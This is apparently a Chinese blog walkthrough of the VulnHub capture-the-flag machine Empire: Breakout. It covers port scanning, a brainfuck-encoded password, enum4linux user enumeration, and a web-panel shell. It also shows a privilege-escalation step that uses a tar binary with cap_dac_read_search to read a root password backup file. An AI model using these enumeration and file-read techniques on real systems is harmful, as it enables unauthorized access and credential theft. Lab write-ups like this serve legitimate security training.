- 英文名称:Empire: Breakout
- 中文名称:帝国:突围
- 发布日期:2021 年 10 月 21 日
- 难度:容易
- 描述:这个盒子被创建为一个简单的盒子,但如果你迷路了,它可以是中等的。提示不和谐服务器( https://discord.gg/7asvAhCEhe )
- 下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、获取IP地址基本信息(192.168.199.166)
IP
2、端口扫描,发现80、139、445、10000、20000端口
开放的端口
10000端口
20000端口
3、进入web页面,查看源代码,得到线索
web首页
查看源代码,得到线索
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
4、brainfuck在线解码,得到线索:.2uqPEfj3D<P'a-3
brainfuck在线解码
5、使用enum4linux对445端口进行用户探测,拿到用户名:cyber
enum4linux -a 192.168.199.166
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
6、尝试登录web页面,成功登录20000端口
20000端口登录成功
7、点击左下角shell图标,直接拿到交互式shell,轻松收下普通用户的flag
普通用户flag
8、全看tar权限,可以读取任意文件
CAP_DAC_READ_SEARCH: 忽略文件读及目录搜索的 DAC 访问限制
[cyber@breakout ~]$ ls -hl tar
-rwxr-xr-x 1 root root 520K Oct 19 2021 tar
[cyber@breakout ~]$ getcap tar
tar cap_dac_read_search=ep
9、使用tar压缩和解压缩,成功获得root 权限的flag
cyber@breakout ~]$ ./tar -cvf ailx10.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
/var/backups/.old_pass.bak
[cyber@breakout ~]$ ./tar -xvf ailx10.tar
var/backups/.old_pass.bak
[cyber@breakout ~]$ ls
ailx10.tar
tar
user.txt
var
[cyber@breakout ~]$ cat ./var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h
tar压缩和解压缩
到此,实验完成~
发布于 2022-08-20 22:43